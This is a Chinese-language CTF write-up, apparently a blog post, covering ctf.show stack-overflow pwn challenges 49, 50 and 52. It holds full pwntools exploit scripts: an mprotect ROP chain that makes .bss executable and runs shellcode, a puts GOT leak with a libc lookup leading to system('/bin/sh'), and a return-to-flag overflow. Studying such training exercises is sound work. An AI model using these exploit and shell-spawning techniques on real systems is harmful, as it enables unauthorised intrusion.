嘿嘿嘿,慢慢更新,预计7月底栈溢出全部更完,至于为什么是7月底更完栈溢出,因为我善
pwn49
一道32位的静态题,先简单说一下mprotect函数(直接复制粘贴了!)
include <unistd.h>
include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot);
mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。
prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:
1)PROT_READ:表示内存段内的内容可读;
2)PROT_WRITE:表示内存段内的内容可写;
3)PROT_EXEC:表示内存段中的内容可执行;
4)PROT_NONE:表示内存段中的内容根本没法访问。
不过要注意的是锁指定的内存区间必须包含整个内存页(4K)。区间开始的地址start必须是一个内存页的起始地址,并且区间长度len必须是页大小的整数倍。意思就是地址后三位为0结尾(4096)的整数倍
这里的pr0t直接设为0x7就可以了,类似于linux中文件的可读可写可执行(RWX)
先找下要用到的pop链
ROPgadget --binary ./pwn --only "pop|ret" | grep "pop"
这里随便选只要有3个pop,加上一个ret就行了。
(这里可能有人要问,不是说32位用栈传参吗?64位用寄存器传参吗? 糊涂啊傻宝儿!都说了随便选的啦那能用寄存器传参吗?这里用寄存器只是为了能够继续控制程序,需要用到ret指令,所以这里就借用指令片段了)
所以我们的思路就是用mprotect这个逼玩意儿改一段地址让它可执行就完事了。(这里写0x080DB000也就是.bss段-0x320的地址)
在ida中用Ctrl+S可以看地址段
多的不说了,都说栈溢出的套路,直接上代码
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28141)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
ru(" * ************************************* ")
pop_chain = 0x0809f805
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
shellcode = asm(shellcraft.sh())
bss = 0x080DB000
payload = b"a"*(0x12+4)
payload += p32(mprotect_addr)+p32(pop_chain)+p32(bss)+p32(0x1000)+p32(0x7)
payload += p32(read_addr)+p32(bss)+p32(0x0)+p32(bss)+p32(len(shellcode))
sl(payload)
sl(shellcode)
itr()
pwn50
不知道为啥我的kali检索不到libc库,最后还是windows系统上的LibcSearcher才检索到libc,可能是我kali上的版本太低了,但国内访问github慢的要死半天没更新LibcSearcher服了。
这里的libc是libc6_2.27-3ubuntu1.5_amd64
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28312)
# io = process(pwnfile)
elf = ELF(pwnfile)
# libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
ru(" * ************************************* ")
leak_name = "puts"
leak_plt_addr = elf.plt[leak_name]
leak_got_addr = elf.got[leak_name]
ret_addr = elf.symbols['ctfshow']
ret = 0x00000000004004fe
pop_rdi = 0x00000000004007e3
payload = b"a"*(0x20+8)+p64(pop_rdi)+p64(leak_got_addr)+p64(leak_plt_addr)+p64(ret_addr)
sl(payload)
ru(b"\n")
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print("puts_addr------->:",hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
base_addr = puts_addr-libc.dump("puts")
print("base_addr-------->: ",hex(base_addr))
system = base_addr+libc.dump('system')
binsh = base_addr+libc.dump("str_bin_sh")
payload = b"a"*(0x20+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
sl(payload)
itr()
pwn51
没学过C++,脑壳大看不懂史密达。
pwn52
很简单的栈溢出直接给代码吧
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28240)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
ru("What do you want?")
flag = 0x08048586
payload = b"a"*(0x6C+4)+p32(flag)+b"s"*4+p32(0x36c)+p32(0x36D)
# gdb.attach(io)
sl(payload)
itr()
这里的payload可以自己用gdb调试出来,如图
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
